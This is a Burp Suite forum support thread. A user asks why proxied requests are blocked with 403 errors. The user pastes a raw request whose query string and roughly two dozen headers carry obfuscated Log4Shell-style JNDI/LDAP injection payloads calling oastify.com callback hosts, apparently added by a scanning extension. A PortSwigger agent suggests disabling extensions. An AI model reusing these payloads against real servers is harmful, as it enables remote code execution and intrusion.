Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

i got a 403 every time i proxy true burp

godwin-X | Last updated: Feb 28, 2024 01:06AM UTC

good day buddies pls i got a 403 every time i proxy true burp then check the request and discover that some additional poisonous headers is been added which makes waf to block the request pls any guide on how to fix this issue the request + additional headers GET /en?hey=5002&action=$%7Bjn$%7Blower:d%7Di:l$%7Blower:d%7Dap://$%7Blower:x%7D$%7Blower:f%7D.twt3wkcvtej9ewbplt990z4o8fe7e42t.oastify.com/a%7D/ HTTP/2 Host: orbs.toolsforhumanity.com Cookie: _dd_s= Cache-Control: no-transform Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft Edge";v="122" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.6nugnx38kram5922c60mrcv1zs5k5gt5.oastify.com/a} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 From: root@${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.ezhoz5fgwzmuhheaoecu3k79b0hshn5c.oastify.com/a} Cf-Connecting_ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.806i0zgaxtnoibf4p8do4e83cuimik69.oastify.com/a} Forwarded: for=spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.xop7oo4zlibd603tdx1ds3ws0j6b6auz.oastify.com/a};by=spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.xop7oo4zlibd603tdx1ds3ws0j6b6auz.oastify.com/a};host=spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.xop7oo4zlibd603tdx1ds3ws0j6b6auz.oastify.com/a} X-Host: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.b9ll92pd6wwrreo7ybmrdhh6lxrprpfe.oastify.com/a} Contact: root@${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.p9zz9gpr6aw5rsolypm5dvhklbr3r4ft.oastify.com/a} True-Client-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.9pzjp05bmucp7c45e92ptfx41v7n7pve.oastify.com/a} X-Arbitrary: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.dfwnf4vfcy2txgu94dstjjn8rzxrxulj.oastify.com/a}/ X-Forwarded-Server: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.jf2tfavlc42zxmuf4jszjpner5xxx1lq.oastify.com/a} X-Client-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.alzkl11civ8q3d06aayqpgt5xw3o3tri.oastify.com/a} Proxy-Host: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.76bh6ym93stnoal3v7jnade2itolpbd0.oastify.com/a} Profile: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.im8sm92kj39y4l1ebizyqoudy44w5ntc.oastify.com/a}/wap.xml Client-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.bwblw2cdtwjreeb7lb9r0h468xepfh36.oastify.com/a} Via: 1.1 ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.dm3nm42fjy9t4g19bdztqju8yz4r5kt9.oastify.com/a} X-Real-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.4uzeuva6rphkc790j47kya2z6qcidc11.oastify.com/a} X-Api-Version: : ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.wnn6nn3ykhac5z2scw0cr2vrzi5a65uu.oastify.com/a} X-Forwarded-Proto: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.eewoe5ugbz1uwhta3eruikm9q0wsxold.oastify.com/a}/header, Referer: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.d6kn64mf3yttogl9vdjtaje8izorpodd.oastify.com/a}/ref X-Forwarded-For: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.v5155mlx2gsbnykruvib91dqhhn9o7cw.oastify.com/a} X-Originating-Ip: spoofed.${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.rup1uiatrch7cu9njr77yx2m6dc5d41t.oastify.com/a} X-Wap-Profile: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.rwr1wicttcj7eubnlr970x4m8de5f53u.oastify.com/a}/wap.xml X-Http-Destinationurl: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.bkzlk20dhw7r2ez79bxrohs6wx2p3qrf.oastify.com/a}/ Destination: ${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.ywy8wpc0tjjee1buly9e044t8kecfe33.oastify.com/a} Proxy: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.y6586pm03jteo1luvyjea4etikocpfd4.oastify.com/a} X-Original-Url: http://${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.jk7tka0lh47z2mzf9jxzopsew52x31rq.oastify.com/a}/

Dominyque, PortSwigger Agent | Last updated: Feb 28, 2024 07:40AM UTC

Hi Do you have any extensions installed? You can find this under "Extensions > Installed". If you disable all extensions, do you still see the additional headers?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.